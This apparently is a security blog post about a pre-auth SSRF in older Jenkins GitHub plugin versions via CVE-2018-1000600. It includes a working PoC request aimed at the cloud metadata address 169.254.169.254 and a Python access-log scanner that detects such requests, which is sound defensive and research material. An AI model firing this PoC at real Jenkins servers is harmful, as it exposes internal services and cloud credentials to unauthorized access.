
Second exploit from the blog post:


https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html


Chained with CVE-2018-1000600 to a Pre-auth Fully-responded SSRF

https://jenkins.io/security/advisory/2018-06-25/#SECURITY-915


This affects the GitHub plugin that is installed by default. However, I learned that when you spin up a new Jenkins instance, it pulls all the updated plugins (also by default). I'm honestly not sure how often people set update to latest plugin on by default, but it does seem to knock down some of this stuff.



Exploit works against: GitHub Plugin up to and including 1.29.1



When I installed Jenkins today (25 Feb 19), it installed 1.29.4 by default; thus the below does NOT work.


From the blog post:


CSRF vulnerability and missing permission checks in GitHub Plugin allowed capturing credentials 

It can extract any stored credentials with known credentials ID in Jenkins. But the credentials ID is a random UUID if there is no user-supplied value provided. So it seems impossible to exploit this? (Or if someone knows how to obtain credentials ID, please tell me!)

Although it can’t extract any credentials without known credentials ID, there is still another attack primitive – a fully-response SSRF! We all know how hard it is to exploit a Blind SSRF, so that’s why a fully-responded SSRF is so valuable!

PoC:

http://jenkins.local/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword
?apiUrl=http://169.254.169.254/%23
&login=orange
&password=tsai
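
Requests like this leave a recognizable trace in web access logs when the parameters are sent in the URL. The following is an added example, not code from the original post or from Orange's blog: it scans access-log lines for hits on the endpoint above and flags any apiUrl that is not an expected GitHub API host. The combined log format, the sample lines and the ALLOWED_API_HOSTS allowlist are assumptions.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint taken from the PoC on this page.
ENDPOINT = ("descriptorByName/org.jenkinsci.plugins.github.config."
            "GitHubTokenCredentialsCreator/createTokenByPassword")
# Assumption: the only GitHub API host this Jenkins legitimately talks to.
ALLOWED_API_HOSTS = {"api.github.com"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Feb/2019:10:00:01 +0000] "GET /job/build/ HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Feb/2019:10:00:07 +0000] "GET /securityRealm/user/admin/'
    + ENDPOINT + '?apiUrl=http://169.254.169.254/%23&login=x&password=y HTTP/1.1" 200 90',
    '10.0.0.7 - - [25/Feb/2019:10:00:09 +0000] "GET /' + ENDPOINT
    + '?apiUrl=https://api.github.com&login=x&password=y HTTP/1.1" 200 90',
]

def classify_api_url(api_url):
    """Return a reason string if apiUrl is not an expected GitHub API host."""
    try:
        host = (urlsplit(api_url).hostname or "").lower()
    except ValueError:
        return "apiUrl is not a parseable URL"
    if not host:
        return "apiUrl missing or has no host"
    try:
        ip = ipaddress.ip_address(host)
        if ip.is_link_local or ip.is_private or ip.is_loopback:
            return f"apiUrl targets internal address {ip}"
    except ValueError:
        pass  # not an IP literal; fall through to the allowlist check
    if host not in ALLOWED_API_HOSTS:
        return f"apiUrl host {host} is not in the allowlist"
    return None

def scan(lines):
    """Return [(line_number, reason)] for suspicious createTokenByPassword hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m or ENDPOINT not in m.group(1):
            continue
        for api_url in parse_qs(urlsplit(m.group(1)).query).get("apiUrl", [""]):
            reason = classify_api_url(api_url)
            if reason:
                hits.append((n, reason))
    return hits
```

Add any GitHub Enterprise hostname your instance really uses to the allowlist. Parameters sent in a POST body do not appear in access logs, so such requests are reported as "apiUrl missing or has no host" and need manual review.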


To get old versions of the plugin and info, you can go to:

https://wiki.jenkins.io/display/JENKINS/GitHub+Branch+Source+Plugin



Download old versions:

https://updates.jenkins.io/download/plugins/github-branch-source/
https://updates.jenkins.io/download/plugins/github/


More/Source: https://blog.carnal0wnage.com/2019/03/jenkins-cve-2018-1000600-poc.html


By Intelwar
